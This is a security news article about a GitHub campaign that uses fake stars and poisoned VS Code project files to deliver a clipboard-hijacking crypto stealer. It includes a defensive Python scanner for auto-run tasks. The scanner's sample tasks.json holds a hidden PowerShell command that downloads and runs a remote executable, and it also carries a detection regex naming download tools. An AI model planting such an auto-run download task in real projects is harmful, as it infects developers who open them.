Keyzetsu 2.0? Cryptoclippers Attack GitHub Users.

Father

Fake stars lull unsuspecting developers into complacency.

Hackers have started abusing GitHub's search function to trick users who search for popular repositories into downloading fake packages containing malware.

The latest attack on the open source software supply chain was reported by Checkmarx, which noted that the malicious code is hidden in Microsoft Visual Studio Code project files and is designed to download the subsequent stages of the malware from remote URLs.
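As an added illustration (not code from the Checkmarx report or from this post), here is a small defensive check for the carrier described above: it scans a `.vscode/tasks.json` for tasks that VS Code runs automatically when the folder is opened (`runOptions.runOn: folderOpen`) and whose command fetches or launches something from a remote URL. That the campaign used this particular file and mechanism is an assumption, since the post only says "project files"; the sample `tasks.json` is constructed for the demonstration.

```python
import json
import re

# Constructed sample of a suspicious .vscode/tasks.json (not taken from the report):
# the "build" task auto-runs on folder open and pulls a second stage from a remote URL,
# "prepare" auto-runs but is harmless, "test" is an ordinary manual task.
SUSPICIOUS_TASKS_JSON = r'''
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "powershell -w hidden -c \"iwr https://example.invalid/stage2 -OutFile $env:TEMP\\s.exe; & $env:TEMP\\s.exe\"",
      "runOptions": { "runOn": "folderOpen" }
    },
    { "label": "prepare", "type": "shell", "command": "echo ready",
      "runOptions": { "runOn": "folderOpen" } },
    { "label": "test", "type": "shell", "command": "npm test" }
  ]
}
'''

# Indicators of a network fetch or a hidden second-stage launcher inside a task command.
DOWNLOAD_PATTERNS = re.compile(
    r"(?i)\b(curl|wget|iwr|invoke-webrequest|invoke-expression|iex|certutil|bitsadmin|start-bitstransfer)\b"
    r"|https?://|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden"
)

def task_command_text(task):
    """Flatten 'command' and 'args' (strings or lists) into one string for matching."""
    parts = []
    for key in ("command", "args"):
        value = task.get(key)
        if isinstance(value, str):
            parts.append(value)
        elif isinstance(value, list):
            parts.extend(str(v) for v in value)
    return " ".join(parts)

def find_autorun_download_tasks(tasks_json_text):
    """Return labels of tasks that auto-run on folder open AND show download/launch indicators."""
    # Real tasks.json files may contain comments and trailing commas (JSONC); strip those first.
    doc = json.loads(tasks_json_text)
    flagged = []
    for task in doc.get("tasks", []):
        auto_run = task.get("runOptions", {}).get("runOn") == "folderOpen"
        if auto_run and DOWNLOAD_PATTERNS.search(task_command_text(task)):
            flagged.append(task.get("label", "<unlabelled>"))
    return flagged

if __name__ == "__main__":
    print(find_autorun_download_tasks(SUSPICIOUS_TASKS_JSON))  # ['build']
```

Auto-run alone is not flagged (the "prepare" task passes), only the combination of auto-run and a fetch/launch indicator, which is the pattern the report describes.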

According to security researcher Yehuda Gelb, the criminals create malicious repositories with popular names and topics and use automated updates and fake stars (a platform-internal quality signal) to raise their search rankings and mislead users. This gives the illegitimate repositories a semblance of legitimacy, deceiving developers into downloading them.

Checkmarx experts quickly found darknet services selling such stars for money. In previous scam campaigns, attackers added hundreds or thousands of stars to their repositories, but in the recent attacks they chose a more modest number, probably so as not to arouse suspicion or to save money.

Many of the fake repositories disguise themselves as legitimate projects related to popular games and tools, making them harder to distinguish from genuine code.

Experts have also observed that some repositories contain an encrypted ".7z" file holding an executable named "feedbackAPI.exe" with a size of 750 MB. Such a large size is probably meant to exceed the file-size limits of anti-virus scanning.

Eventually, malware is launched that replaces cryptocurrency wallet addresses copied to the clipboard with addresses controlled by the attackers. According to Checkmarx, this malicious software has some similarities with the well-known Keyzetsu clipper, but it is not an exact copy of it.

The researchers' findings underline how important it is for developers to carefully check source code downloaded from open repositories, and not to rely solely on a repository's reputation, since it can be easily forged.